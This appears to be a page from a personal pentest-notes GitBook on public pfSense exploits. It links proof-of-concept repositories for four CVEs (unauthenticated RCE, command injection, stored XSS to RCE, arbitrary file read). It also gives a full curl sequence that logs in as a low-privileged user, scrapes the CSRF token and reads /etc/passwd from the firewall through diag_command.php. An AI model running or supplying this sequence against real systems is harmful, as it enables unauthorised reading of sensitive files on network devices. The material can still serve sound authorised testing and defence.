0xSs0rZ
Ctrlk
  • Hello World
  • Whoami
  • Interesting Books
  • Pentest
    • CheckLists
    • Recon
    • Protocols
    • Brute force
    • Shells
    • File Transfer
    • Web attacks
    • API
    • Public Exploit
      • Search for CVE PoC
      • Convert line breaks from DOS to Linux
      • 7 zip
      • Adobe Acrobate Reader
      • Aiohttp
      • Akamai Cloutest
      • Angular
      • AnyDesk
      • Apache Active MQ
      • Apache Camel
      • Apache Kafka
      • Apache OFBiz
      • Apache Struts
      • Apache Traffic Control
      • Axis IP Camera
      • Cacti
      • Chamilo elearning
      • Check Point
      • Cisco
      • Citrix
      • Cleo File Transfer
      • Commvault
      • CrushFTP
      • CyberPanel
      • D-Link
      • Denodo Scheduler
      • ElFinder
      • F5 Big-IP
      • Formbricks
      • Fortinet
      • Froxlor
      • GeoServer
      • Ghostscript
      • Git
      • Gitea
      • GLPI
      • Gogs
      • Grafana
      • Invision Community
      • ISPConfig
      • Ivanti
      • Keycloak
      • Langflow
      • Laravel
      • Mitel MiCollab
      • MobileIron
      • MOVEit Transfer
      • Navidrome
      • Next.js
      • Node.js
      • Nostromo
      • Notepad ++
      • NVMS 1000
      • OpenNetAdmin
      • Oracle E-business Suite
      • Oracle PeopleSoft
      • Oracle Weblogic
      • Palo Alto
      • Pandora
      • PDF.js
      • pfSense
      • PHP
      • phpMyAdmin
      • Prestashop
      • Roundcube
      • rsync
      • Salesforce
      • SAP
      • Scriptcase
      • SolarWinds
      • SonicWall
      • Splunk
      • Spring
      • SQLPad
      • Squid Proxy
      • SuiteCRM
      • Symfony
      • Synology
      • SysAid
      • TeamViewer
      • TP Link
      • vBulletin
      • Vite.js
      • VMWare
      • Wazuh
      • Wing FTP
      • Winrar
      • YesWiki
      • Zabbix
      • Zimbra
      • ZoneAlarm AV/Firewall
      • ZoneMinder
    • External Pentest
    • Internal Pentest
    • Privilege Escalation
    • Post Exploitation
    • Cracking
    • Thick Client Pentest
    • Wifi Pentest
    • Mobile Pentest
    • Configuration Audit / Hardening
    • Code Analysis
    • Tools
    • Search Engines
    • Cheatsheets
    • Note Keeping / Reporting / Admin Stuff
  • Cloud
    • Cloud VM
    • Enumeration
    • SSRF / RCE
    • Azure
    • AWS
    • GCP
    • Kubernetes
    • Tools
  • Labs
  • Antivirus Evasion - Defender
    • Mindmap
    • Defender Module for PowerShell
    • Static Analysis
    • Dynamic Analysis
    • AMSI Bypass
    • Process Injection
    • Open-Source Software
    • User Access Control (UAC)
    • AppLocker
    • LOLBAS / LOLDrivers / LOLESXi
    • PowerShell ConstrainedLanguage Mode, CLM
    • VBScript
    • Bypass all Powershell security features (AMSI,CLM)
    • Bypass AV Payload / Shells
    • Find Folder Exclusions
    • Resources
  • EDR BYPASS
    • Approches for Evasion
    • Tools
    • Obfuscation
    • EDR Killer
    • BYOVD
    • Spoof Command Line Arguments
    • Blind Spots
    • Living Off Security Tools / LOTTunels
    • Process Hollowing
    • Process Injection - Reverse Shell
    • Payload Creation
    • Shellcode Loader
    • MalDev
    • Malware Testing Lab
    • Resources
  • Red Team
    • OpSec / Anonymity
    • Initial Access
    • Infrastructure (phishing, C2, redirector)
    • C2
    • EDR / AV Bypass
    • Physical Penetration Testing
    • Bypass Bitlocker
    • Resources
  • CTF
    • OSINT
    • Forensic
    • Cryptography
    • Steganography
    • Write Up
Powered by GitBook
On this page
  1. Pentest
  2. Public Exploit

pfSense

pfSense exploits (PoC)

ko-fi

CVE-2022-31814 - Unauth RCE

pfBlockerNG <= 2.1.4_26 Unauth RCE

LogoExploiting pfsense Remote Code Execution – CVE-2022-31814 - LaburityLaburity - Cyber Security Services
LogoGitHub - Chocapikk/CVE-2022-31814: pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)GitHub

CVE-2025-53392 - Arbitrary File Read

pfSense 2.8.0 via Diagnostics Web Interface

LogoGitHub - skraft9/pfsense-security-researchGitHub

CVE-2023-42326 - PfSense 2.7.0 Command Injection Exploit

LogoGitHub - bl4ckarch/CVE-2023-42326: This is a simple POC to for show the pfsense 2.7 Command injection Vulnerability ( CVE-2023-42326)GitHub

CVE-2024-46538 PfSense Stored XSS lead to RCE

LogoGitHub - EQSTLab/CVE-2024-46538: PfSense Stored XSS lead to Arbitrary Code Execution exploitGitHub
PreviousPDF.jsNextPHP

Last updated 5 months ago

  • CVE-2022-31814 - Unauth RCE
  • CVE-2025-53392 - Arbitrary File Read
  • CVE-2023-42326 - PfSense 2.7.0 Command Injection Exploit
  • CVE-2024-46538 PfSense Stored XSS lead to RCE
# 1. Start session and extract CSRF token
$ curl -k -c cookies.txt -s https://<IP>/diag_command.php > login_page.html
$ csrf_token=$(grep '__csrf_magic' login_page.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 2. Authenticate as low-privileged user "dev"
$ curl -k -b cookies.txt -c cookies.txt \
  -d "__csrf_magic=$csrf_token" \
  -d "usernamefld=dev" \
  -d "passwordfld=pass" \
  -d "login=Sign+In" \
  https://<IP>/index.php > /dev/null

# 3. Get CSRF token post-login
$ curl -k -b cookies.txt -s https://<IP>/diag_command.php > diag_authed.html
$ csrf_token=$(grep '__csrf_magic' diag_authed.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 4. Exfiltrate arbitrary file (example: /etc/passwd)
$ curl -k -b cookies.txt -s -X POST https://<IP>/diag_command.php \
  -d "__csrf_magic=$csrf_token" \
  -d "submit=DOWNLOAD" \
  -d "dlPath=/etc/passwd"